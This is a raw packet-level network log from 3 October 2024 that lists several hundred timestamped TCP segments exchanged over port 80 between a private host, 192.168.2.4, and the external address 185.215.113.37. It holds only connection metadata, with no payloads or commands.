Oct 3, 2024 18:38:23.655462027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655498981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655515909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655551910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.664906979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.664966106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.664968014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665002108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665011883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665045023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665088892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665122032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665136099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665157080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665170908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665191889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665226936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665241003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665272951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665280104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665316105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665348053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665364981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665383101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665395975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665417910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665432930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665455103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.665467024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.665505886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.666059971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.666110992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668412924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668447971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668469906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668483019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668493986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668529034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668565035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668600082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668617964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668633938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668649912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668669939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668684006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668705940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668720007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668745995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668786049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668818951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668838978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668852091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668859959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668888092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668903112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668926001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668945074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.668962002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.668996096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669006109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669029951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669042110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669064045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669075012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669107914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669261932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669296980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669317007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669332027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669342995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669367075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669378042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669400930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669421911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669433117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669450998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669467926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669481993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669501066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669517994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669533968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669548988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669568062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669583082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669601917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669616938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669650078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669698954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669732094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669779062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669796944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669831038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669847012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669864893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669883013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669900894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669907093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669936895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669945002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.669974089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.669981956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670010090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670023918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670047045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670062065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670098066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670166969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670201063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670221090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670236111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670245886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670273066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670279980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670308113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670324087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670342922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670357943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670377016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670392036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670412064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670430899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670447111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670465946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670497894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670577049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670609951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670629025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670643091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670653105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670676947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670690060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670712948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670727968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670747995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670763016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670795918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670897007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670929909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670952082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670963049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.670978069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.670995951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671008110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671032906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671052933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671065092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671080112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671102047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671112061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671137094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671143055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671170950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671181917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671206951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671216965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671241045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671252012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671276093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671286106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671329975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671365023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671367884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671391964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671412945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671422958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671452045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671473026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671485901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671495914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671521902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671533108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671556950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671574116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671591043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671606064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671627045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.671638966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.671675920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745311975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745403051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745429993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745445013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745475054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745526075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745548964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745582104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745599985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745615959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745631933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745651007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745666981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745687008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745699883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745721102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745737076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745754004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745770931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745800018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745839119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745872974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745903015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745908022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745918036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745943069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745975971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.745979071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.745992899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746011019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746022940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746043921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746078014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746098042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746114969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746128082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746148109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746181965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746193886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746213913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746226072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746258974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746315956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746347904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746372938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746383905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746402979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746438026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746449947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746476889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746479988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746512890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746527910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746548891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.746562958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.746598959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756102085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756134987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756160975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756170034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756180048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756222010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756256104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756269932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756304979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756309032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756360054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756392002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756393909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756401062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756434917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756444931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756479025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756494045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756513119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756535053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756547928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756561995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756582022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756588936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756647110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.756674051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.756697893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767371893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767427921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767429113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767463923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767474890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767518044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767527103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767551899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767585993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767600060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767620087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767653942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767653942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767678022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767779112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767796040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767827988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767843008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767862082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767874002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767899036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767908096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.767932892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767966032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.767971992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768001080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768013000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768038034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768045902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768083096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768395901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768445969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768470049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768486977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768521070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768533945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768554926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768588066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768589973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768600941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768620968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768630981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768656015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768690109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768702030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768723011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768735886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768759012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768768072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768794060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768807888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768826962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768836975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768862963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768874884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768897057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768907070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768932104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768948078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.768970966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.768978119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769006968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769018888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769052029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769184113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769217968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769249916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769273043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769298077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769284010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769347906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769356012 CEST	80	49730	185.215.113.37	192.168.2.4
